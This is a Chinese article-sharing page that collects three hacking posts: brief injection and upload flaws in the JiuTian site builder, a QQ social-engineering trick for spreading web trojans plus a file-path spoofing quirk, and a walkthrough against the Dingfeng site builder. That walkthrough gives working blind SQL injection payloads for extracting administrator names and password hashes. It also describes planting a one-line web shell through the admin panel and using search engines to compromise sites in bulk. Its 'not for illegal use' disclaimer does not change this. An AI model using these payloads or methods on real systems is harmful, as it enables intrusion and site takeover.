九天智能建站V5.2小漏洞两个

| 收藏本文 下载本文 作者:安妮

下面是小编收集整理的九天智能建站V5.2小漏洞两个(共含3篇),供大家参考借鉴,希望可以帮助到有需要的朋友。同时,但愿您也能像本文投稿人“安妮”一样,积极向本站投稿分享好文章。

九天智能建站V5.2小漏洞两个

篇1:九天智能建站V5.2小漏洞两个

九天名列自助建站领域的前茅

一是注入漏洞,newshow.asp的id参数存在注入漏洞,可以猜解出member表,得到用户账号密码,

九天智能建站V5.2小漏洞两个

二是上传漏洞,在资源管理那里可以抓包后上传asp文件。

篇2:QQ两个小漏洞

作者:TLZHBOLG

这两个漏洞很小,没有什么利用价值,但是为了喜好研究一下

1,别人给我们发个信息中如果包含网页的时候会显示个超连接,我们这时候把它选定却常自己打开了该页面,这个估计大家都有体验,关键是看大家如何去构思......

我们利用此来传播网页木马就是个例子,关键是要他复制,现在让别人打开一个页面太难了,我们可以说

因为某某事情,希望把该信息发给N个人,之后腾讯会给予什么什么奖励......

2,这个是 鱼 告诉我的,没有什么价值,但值得研究,就是路径跟文件名的欺骗

方法:

首先我们在D盘下(什么地方都一样,我这里选择的D盘)放一个EXE文件,名为tlzh,在来D盘建立个文件夹,名字也是tlzh,用另一个QQ传送文件,在用一QQ接收并保存到D:\tlzh\ 下,完成后会出现一条连接显示该路径地址,并建议杀毒(QQ窗口中)我们点一下那个路径按长理说会打开d:\tlzh 文件夹,但点后却发现 直接打开了 d 盘下的 tlzh.exe 文件

篇3:鼎峰企业智能建站系统注入搜索注入漏洞分析与利用漏洞预警

作者:莫ㄨ问

版本:鼎峰企业智能建站系统ASP版 V0.3.6

昨天利用这个系统拿了一个webshell,但是是利用下载默认数据库的,后面发现者这套系统界面搞得还不错,就顺便看下它的安全性了,本文就其搜索注入漏洞简单分析和利用,及批量拿shell。

一.  简单分析

漏洞文件:zm_search.asp代码如下

key=Request.Form(“key”)

if t=“” or key=“” then

Response.Write(“”)

Response.End()

end if

if t=1 then

sql=“select * from Zm_Product where name like '%”&key&“%' order by ord asc,id desc”

menuname=“搜索产品”

else

sql=“select * from Zm_News where title like '%”&key&“%' order by  ord asc,id desc”

menuname=“搜索新闻”

end if

对表单中变量t和key直接获取,只判断是否为空,不为空就带入查询,这就造成了搜索型注入漏洞。

这里照顾下新手:

学习下SQL数据查询中WHERE子句使用Like操作符的知识,Like操作符所起的作用就是模糊查询,要使用Like进行模糊查询必须还要配合通配符才能完成,“%”就是Like操作符中的一种通配符,它代表零个或多个任意字符,为了大家理解,为大家举了一些例子:

Like “ %” 返回以 开始的任意字符

Like “% ” 返回以 结尾的任意字符

Like “% %” 返回以包含 的任意字符

我们打开一个网站,在搜索框里输入关键字' and 1=1 and '%'='关键字就为“黑帽”吧,点搜索,结果返回与黑帽有关的资料,即语句 ' and 1=1 and '%'=',就属于正常,后面在输入语句 ' and 1=2 and '%'=' 没有找到相关资料。当然这里注意,这个关键字是要能够找到文章的。

二、漏洞利用

原理知道了,我们构造一下注入语句,这里我们以搜索“鼎峰”这个关键字,鼎峰所有是可以搜索到内容的,记住这里一定要可以搜索到否则后面很难分辨。我们在回到原来的首页搜索输入如下语句:(构造的时候要注意闭合前后%和单引号)

鼎峰%' and 1=1 and '%'='          -----------------语句1

可是无法输入全部代码,看来限制了搜索长度,打开发现最大是20个字符,在看下代码发现它是将search。Asp提交给zm_search.asp处理。这样我们就可以自己写个表单给t和key赋值来突破长度限制。代码就不给了,很简单大家自己写下。把表单act

ion值设置成url/search.asp不能提交给zm_search.asp,不清楚的自己去下个代码来看。好了,输入语句1,结果如图1,2:

图1

图2

在一次改变表单中1=1的内容就可以了猜解出来,这里照顾新手,我列出语句并注释作用:

语句2:鼎峰%' and 1=1 and '%'='        ;1=2显然不成立,找不到任何文章,即返回异常

语句3:鼎峰%' and  1<(select count(*) from zm_admin) and '%'='  ;判断管理员的人数是否大于1

语句4:鼎峰%' and (select count(name) from zm_admin)>0 and '%'=' ;判断是否存在表段name,通过查看数据库我们可以直接知道存在的,

语句5:鼎峰%' and (select top 1 asc(mid(name,1,1)) from zm_admin)>96  and '%'=' ;

功能:判断name表段第一个用户名的name的第一个字符的ascii码是否大于96,即是否等于a

同理可以把语句5的中的name字段换成password字段,同样的方法来才接密码md5散列。

当然这种注入用工具也可以扫描出来,但是需要自己添加字段,另外关键词也自己加一个可以搜索到信息的。这里我推荐NBSI和HDSI这两款工具,很简单这里就不演示了。Ok了

三、  后台拿webshell

注入可以得到管理员的密码,那么进入后台看看默认地址:Manage/login.asp 这里简单利用R()函数过滤掉了单引号,万能密码没戏了。直接用注入拿到管理密码登陆。在网站配置标题直接写入一句话木马,不过这里要注意闭合语句,构造如下:

插马成功,如图3:

[localfile=4]

Ok了。百度搜下就可以批量拿webshell了,这里不说大家自己发挥,不要用于非法用途。当然这里系统还有很多问题,有兴趣的朋友可以继续挖掘。

本文到此结束,在此申明本文只作技术交流学习,不得用于非法用途,否则后果自负。

文中难免有错,有疑问的可以联系我www.awolf07.cn或者forum.bhst.org

提交的htm表单,比较简单,呵呵..不然有朋友说我忽悠人.

ion=“localhost/search.asp”>

类型:

内容:

图片附件(缩略图):

良精企业通用建站系统漏洞总汇漏洞预警

英语报价两个小技巧

两个有趣的励志小故事

两个神秘的小鞋匠的故事

WoDig社区程序两个页面过滤不严导致SQL注入漏洞

小榕的WIS漏洞补充篇及利用篇脚本安全

教程贴士:Coreldraw的两个小技巧让你使用更方便

九天智能建站V5.2小漏洞两个(精选3篇)

欢迎下载DOC格式的九天智能建站V5.2小漏洞两个,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

相关文章

热门推荐

HOT

猜你喜欢

NEW
点击下载本文文档